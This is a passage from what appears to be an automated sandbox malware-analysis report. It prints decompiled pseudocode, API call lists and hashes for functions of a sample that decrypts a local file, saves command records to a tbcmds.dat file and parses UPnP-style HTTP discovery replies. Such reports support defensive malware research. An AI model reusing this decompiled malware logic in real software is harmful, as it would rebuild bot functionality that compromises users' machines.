                                                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                                                    				DWORD* _t70;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v21 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t54 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v16 = _t54;
                                                                                                                                                                                                                                                                                    				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_t56 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						_v16 = _t56;
                                                                                                                                                                                                                                                                                    						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_v21 = 1;
                                                                                                                                                                                                                                                                                    							WriteFile(_v16, _v8, _v12,  &_v12, 0); // executed
                                                                                                                                                                                                                                                                                    							CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _v21;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t62 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v28 = _t62;
                                                                                                                                                                                                                                                                                    				if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t64 = MapViewOfFile(_v28, 4, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v32 = _t64;
                                                                                                                                                                                                                                                                                    				if(_v32 == 0) {
                                                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                                    						_t70 = E0040B1E0(_v32, _v32);
                                                                                                                                                                                                                                                                                    						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    						_v20 = _t70;
                                                                                                                                                                                                                                                                                    						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                                    							_v12 = _v20[6];
                                                                                                                                                                                                                                                                                    							_t73 = E0040AB80(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12); // executed
                                                                                                                                                                                                                                                                                    							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                                    							_v8 = _t73;
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								E004094C0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                                    								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                    								asm("repe cmpsd");
                                                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                                                    									E00408C70(_v8);
                                                                                                                                                                                                                                                                                    									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    									_v8 = 0;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v32); // executed
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                                                    0x0040d1d8
                                                                                                                                                                                                                                                                                    0x0040d1dc
                                                                                                                                                                                                                                                                                    0x0040d1e3
                                                                                                                                                                                                                                                                                    0x0040d1ea
                                                                                                                                                                                                                                                                                    0x0040d204
                                                                                                                                                                                                                                                                                    0x0040d20a
                                                                                                                                                                                                                                                                                    0x0040d211
                                                                                                                                                                                                                                                                                    0x0040d323
                                                                                                                                                                                                                                                                                    0x0040d327
                                                                                                                                                                                                                                                                                    0x0040d33c
                                                                                                                                                                                                                                                                                    0x0040d342
                                                                                                                                                                                                                                                                                    0x0040d349
                                                                                                                                                                                                                                                                                    0x0040d34b
                                                                                                                                                                                                                                                                                    0x0040d361
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d375
                                                                                                                                                                                                                                                                                    0x0040d37a
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d225
                                                                                                                                                                                                                                                                                    0x0040d22b
                                                                                                                                                                                                                                                                                    0x0040d232
                                                                                                                                                                                                                                                                                    0x0040d319
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x0040d244
                                                                                                                                                                                                                                                                                    0x0040d24a
                                                                                                                                                                                                                                                                                    0x0040d251
                                                                                                                                                                                                                                                                                    0x0040d30f
                                                                                                                                                                                                                                                                                    0x0040d313
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d257
                                                                                                                                                                                                                                                                                    0x0040d263
                                                                                                                                                                                                                                                                                    0x0040d26d
                                                                                                                                                                                                                                                                                    0x0040d277
                                                                                                                                                                                                                                                                                    0x0040d27c
                                                                                                                                                                                                                                                                                    0x0040d27f
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d29f
                                                                                                                                                                                                                                                                                    0x0040d2b9
                                                                                                                                                                                                                                                                                    0x0040d2be
                                                                                                                                                                                                                                                                                    0x0040d2c1
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d2d6
                                                                                                                                                                                                                                                                                    0x0040d2db
                                                                                                                                                                                                                                                                                    0x0040d2ee
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2f6
                                                                                                                                                                                                                                                                                    0x0040d2fb
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d309
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d309

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D309
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D313
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D31D
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D33C
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D361
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D36B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 171974401-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6335cb23eab44def6f952d64af18e03c790db734405732daa150c51d204b45a0
                                                                                                                                                                                                                                                                                    • Instruction ID: 3921fc4700ee4b190ae2af8b7d894abc0534e186cae3a84a50511f4350192fbd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6335cb23eab44def6f952d64af18e03c790db734405732daa150c51d204b45a0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97512CB5E00208FBDB14DFE4CC59BEEBB74AB48704F208569E611772C0D7B96A45CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 362 404970-40499c EnterCriticalSection call 40b270 365 4049a2-4049b5 call 40b210 362->365 366 404bae-404bc1 LeaveCriticalSection 362->366 365->366 369 4049bb-4049ca 365->369 370 4049d5-4049de 369->370 371 4049cc-4049d2 369->371 372 404ad1-404ad7 370->372 373 4049e4-404a02 370->373 371->370 376 404b04-404b16 call 408c70 372->376 377 404ad9-404ae7 call 4044e0 372->377 374 404a04 373->374 375 404a06-404aca call 408c70 call 408ce0 call 408c70 call 40ab80 call 405c90 373->375 374->371 375->372 376->366 386 404b1c-404b3d CreateFileW 376->386 381 404aec-404af4 377->381 381->376 384 404af6-404b00 381->384 384->376 386->366 388 404b3f-404b46 386->388 390 404b51-404b5a 388->390 392 404b9a-404ba8 FlushFileBuffers CloseHandle 390->392 393 404b5c-404b98 WriteFile 390->393 392->366 395 404b48-404b4e 393->395 395->390
                                                                                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                    			E00404970(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				signed int _v5;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				long _v36;
                                                                                                                                                                                                                                                                                    				signed char _t76;
                                                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                                                                                    				void* _t169;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection("(Z(");
                                                                                                                                                                                                                                                                                    				_t111 = _a12;
                                                                                                                                                                                                                                                                                    				_t76 = E0040B270(_a12, _a16);
                                                                                                                                                                                                                                                                                    				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                                    				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    					_t79 = E0040B210(_t111, _a12);
                                                                                                                                                                                                                                                                                    					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                                    					_v12 = _t79;
                                                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                                                    						_v13 = 0;
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t169 = _v20 -  *0x4163b4; // 0x1
                                                                                                                                                                                                                                                                                    							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v24 = _v20 * 0x110 +  *0x4163b0;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                                    								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x108)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x108)) = E00408CE0(_a12, _a16);
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                                    								E00408C70( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 0x100)) = E0040AB80( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                                    								E00405C90( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                                    								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							_t91 = E004044E0(_a16, _v12, _a12, _a16, 1); // executed
                                                                                                                                                                                                                                                                                    							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                                    							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								 *0x4163b4 = 0;
                                                                                                                                                                                                                                                                                    								_v5 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v12);
                                                                                                                                                                                                                                                                                    						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    							_t82 = CreateFileW("C:\Users\Albus\tbcmds.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                                                                                                                                                    							_v28 = _t82;
                                                                                                                                                                                                                                                                                    							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v32 = 0;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									__eflags = _v32 -  *0x4163b4; // 0x1
                                                                                                                                                                                                                                                                                    									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 =  *0x4163b0; // 0x1eb7da8
                                                                                                                                                                                                                                                                                    									_t88 =  *0x4163b0; // 0x1eb7da8
                                                                                                                                                                                                                                                                                    									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0); // executed
                                                                                                                                                                                                                                                                                    									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t141;
                                                                                                                                                                                                                                                                                    									_v32 = _t141;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection("(Z(");
                                                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x00404978
                                                                                                                                                                                                                                                                                    0x00404981
                                                                                                                                                                                                                                                                                    0x0040498b
                                                                                                                                                                                                                                                                                    0x0040498f
                                                                                                                                                                                                                                                                                    0x00404994
                                                                                                                                                                                                                                                                                    0x0040499c
                                                                                                                                                                                                                                                                                    0x004049a6
                                                                                                                                                                                                                                                                                    0x004049ab
                                                                                                                                                                                                                                                                                    0x004049ae
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x004049bb
                                                                                                                                                                                                                                                                                    0x004049bf
                                                                                                                                                                                                                                                                                    0x004049c3
                                                                                                                                                                                                                                                                                    0x004049d5
                                                                                                                                                                                                                                                                                    0x004049d8
                                                                                                                                                                                                                                                                                    0x004049de
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049f3
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404a11
                                                                                                                                                                                                                                                                                    0x00404a1d
                                                                                                                                                                                                                                                                                    0x00404a38
                                                                                                                                                                                                                                                                                    0x00404a44
                                                                                                                                                                                                                                                                                    0x00404a54
                                                                                                                                                                                                                                                                                    0x00404a68
                                                                                                                                                                                                                                                                                    0x00404a96
                                                                                                                                                                                                                                                                                    0x00404aa2
                                                                                                                                                                                                                                                                                    0x00404abe
                                                                                                                                                                                                                                                                                    0x00404ac3
                                                                                                                                                                                                                                                                                    0x00404ac6
                                                                                                                                                                                                                                                                                    0x00404a04
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004049d2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404a02
                                                                                                                                                                                                                                                                                    0x00404ad5
                                                                                                                                                                                                                                                                                    0x00404ad7
                                                                                                                                                                                                                                                                                    0x00404ae7
                                                                                                                                                                                                                                                                                    0x00404aec
                                                                                                                                                                                                                                                                                    0x00404af2
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404af6
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404b00
                                                                                                                                                                                                                                                                                    0x00404af4
                                                                                                                                                                                                                                                                                    0x00404b08
                                                                                                                                                                                                                                                                                    0x00404b14
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x00404b30
                                                                                                                                                                                                                                                                                    0x00404b36
                                                                                                                                                                                                                                                                                    0x00404b39
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b3f
                                                                                                                                                                                                                                                                                    0x00404b51
                                                                                                                                                                                                                                                                                    0x00404b54
                                                                                                                                                                                                                                                                                    0x00404b5a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404b6b
                                                                                                                                                                                                                                                                                    0x00404b81
                                                                                                                                                                                                                                                                                    0x00404b92
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4b
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b4e
                                                                                                                                                                                                                                                                                    0x00404b9e
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404ba8
                                                                                                                                                                                                                                                                                    0x00404b3d
                                                                                                                                                                                                                                                                                    0x00404b16
                                                                                                                                                                                                                                                                                    0x004049b5
                                                                                                                                                                                                                                                                                    0x00404bb3
                                                                                                                                                                                                                                                                                    0x00404bc1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32((Z(,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404981
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00404B30
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00404B92
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00404B9E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00404BA8
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32((Z(,?,?,00000000,0040A547,006A0266,?,0040A563,00000000,0040B81C,?), ref: 00404BB3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                                    • String ID: (Z($C:\Users\user\tbcmds.dat
                                                                                                                                                                                                                                                                                    • API String ID: 2945370292-52147524
                                                                                                                                                                                                                                                                                    • Opcode ID: 395808a6a0669ea4872ecc346cb8f49b36516ca7ebeabffad03fad16ff85af04
                                                                                                                                                                                                                                                                                    • Instruction ID: 17ab94b32ecbdd43ae5be3672dc601cffb9a037549fc2dffe68e9228f76f24ff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 395808a6a0669ea4872ecc346cb8f49b36516ca7ebeabffad03fad16ff85af04
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 487182B5A00109ABCB04CF94D985FEFB7B5FB88304F148169EA05B7381C779E941CBA9
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 399 40c490-40c4aa 400 40c4bb-40c4c2 399->400 401 40c574-40c57d 400->401 402 40c4c8-40c4e7 recvfrom 400->402 403 40c4f6-40c513 StrCmpNIA 402->403 404 40c4e9-40c4f4 Sleep 402->404 406 40c515-40c534 StrStrIA 403->406 407 40c56f 403->407 405 40c4ac-40c4b5 404->405 405->400 406->407 408 40c536-40c56d StrChrA call 40b290 406->408 407->405 408->407
                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040C490(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				char _v1028;
                                                                                                                                                                                                                                                                                    				char _v1029;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1036;
                                                                                                                                                                                                                                                                                    				char* _v1040;
                                                                                                                                                                                                                                                                                    				char* _v1044;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t20 = __eax;
                                                                                                                                                                                                                                                                                    				_v1029 = 0;
                                                                                                                                                                                                                                                                                    				_v1036 = 0;
                                                                                                                                                                                                                                                                                    				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                                    					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_v1029 = 1;
                                                                                                                                                                                                                                                                                    						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                                    							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                                    							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                                    								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                                    								_t29 = E0040B290(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                                    								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                                    								 *_a8 = _t29;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                                    					_v1036 = _t20;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v1029;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040c490
                                                                                                                                                                                                                                                                                    0x0040c499
                                                                                                                                                                                                                                                                                    0x0040c4a0
                                                                                                                                                                                                                                                                                    0x0040c4bb
                                                                                                                                                                                                                                                                                    0x0040c4de
                                                                                                                                                                                                                                                                                    0x0040c4e7
                                                                                                                                                                                                                                                                                    0x0040c4f6
                                                                                                                                                                                                                                                                                    0x0040c513
                                                                                                                                                                                                                                                                                    0x0040c527
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c53f
                                                                                                                                                                                                                                                                                    0x0040c562
                                                                                                                                                                                                                                                                                    0x0040c567
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c4e9
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4b2
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c57d

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
